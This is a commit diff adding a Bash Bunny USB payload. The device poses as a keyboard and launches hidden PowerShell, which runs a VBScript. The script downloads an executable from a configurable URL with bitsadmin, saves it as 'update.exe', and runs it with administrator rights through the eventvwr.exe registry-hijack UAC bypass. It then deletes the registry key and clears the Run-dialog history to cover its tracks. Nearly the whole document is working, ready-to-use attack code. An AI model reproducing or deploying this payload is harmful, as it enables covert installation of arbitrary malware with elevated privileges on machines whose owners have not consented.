Added UACBypass payload (#191)

* UACBypass ported from ducky to bunny

* Forgot to set device as storage

* Improvment

* Updated for firmware 1.1

* Old

payloads/library/execution/exe_UACBypassD&E/a.vbs

@@ -0,0 +1,33 @@
+Sub Main()
+
+
+	'Userdefined payload settings
+	 URL = "REPLACEME" '<- Replace this with a DIRECT link to the binary ending in .exe
+	 SAVE_NAME = "update.exe"
+	
+	'Download File
+	CreateObject("WScript.Shell").run("cmd /c bitsadmin /transfer SoftUpdate /download /priority FOREGROUND " + URL + " %temp%/" + SAVE_NAME + ""),0,true
+	
+	'Write UAC bypass regkey
+	CreateObject("WScript.Shell").RegWrite "HKCU\Software\Classes\mscfile\shell\open\command\", CreateObject("Scripting.FileSystemObject").GetSpecialFolder(2) +"\" + SAVE_NAME ,"REG_SZ"
+	
+	'Trigger UAC bypass
+	CreateObject("WScript.Shell").Run("eventvwr.exe"),0,true
+	
+	'Reset regkey 
+	GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & "." & "\root\default:StdRegProv").DeleteValue &H80000001,"Software\Classes\mscfile\shell\open\command\",""
+	
+	'Clear the run-dialog history
+	CreateObject("WScript.Shell").Run("cmd.exe /C reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f "),0,true
+End Sub 
+
+On Error Resume Next
+
+  Main
+
+
+  If Err.Number Then
+
+     WScript.Quit 4711
+
+End If

payloads/library/execution/exe_UACBypassD&E/payload.txt

@@ -0,0 +1,37 @@
+# Title:         UACBypass
+# Author:        Skiddie
+# Version:       1.1
+# Target:        Windows
+# 
+# Download and executes any binary executable with administrator privileges WITHOUT
+# prompting the user for administrator rights (aka UAC bypass/exploit)
+# Please define URL and SAVEFILENAME in the a.vbs script 
+# Target does need internet connection
+# Works on Windows 7 - Windows 10
+# The UAC bypass was patched in Win10 V.1607, the file will still execute but with normal user privliges 
+# However from what i am aware version 7,8 and 8.1 are still effected 
+# Currently fastest download and execute for HID attacks to date. (with UAC bypass)
+
+#Define your bunny storage stick name
+DRIVER_LABEL='BashBunny'
+
+#RED means starting
+LED R
+
+#We are a keyboard
+ATTACKMODE HID STORAGE
+
+#Set keyboard language
+DUCKY_LANG us
+
+QUACK DELAY 500
+RUN WIN powershell -windowstyle hidden ".((gwmi win32_volume -f 'label=''$DRIVER_LABEL''').Name+'payloads\\$SWITCH_POSITION\a.vbs')"
+QUACK DELAY 1000
+
+# GREEN means finished
+LED G
+
+#If you would like to bash bunny to shutdown/exit/dismount from the target system after execution, you can uncomment the lines below
+#QUACK DELAY 4500
+#shutdown 0
+

payloads/library/execution/exe_UACBypassD&E/readme.md

@@ -0,0 +1,32 @@
+# UACBypass / UACExploit -  Download and executes any binary executable with administrator privileges WITHOUT UAC prompting for access
+
+Author: @SkiddieTech 
+Version: Version 1.1
+Target:  Windows 7 - Windows 10 (V1607)
+
+## Description
+
+Download and executes any binary executable with administrator privileges WITHOUT
+prompting the user for administrator rights (aka UAC bypass/exploit)
+Please define URL and SAVEFILENAME in the a.vbs script 
+Target does need internet connection
+Works on Windows 7 - Windows 10
+The UAC bypass was patched in Win10 V.1607, the file will still execute but with normal user privliges 
+However from what i am aware version 7,8 and 8.1 are still effected 
+Currently fastest download and execute for HID attacks to date. (with UAC bypass)
+## Configuration
+
+HID or HID STORAGE
+
+## Requirements
+
+Target must be an Windows box with an working internet connection,powershell and vb script enabled (enabled by default) 
+Please edit the a.vbs script with your binary payload URL and savename 
+
+## STATUS
+
+| LED              | Status                                |
+| ---------------- | ------------------------------------- |
+| Red              | Script is starting                    |
+| Green            | Finished                              |
+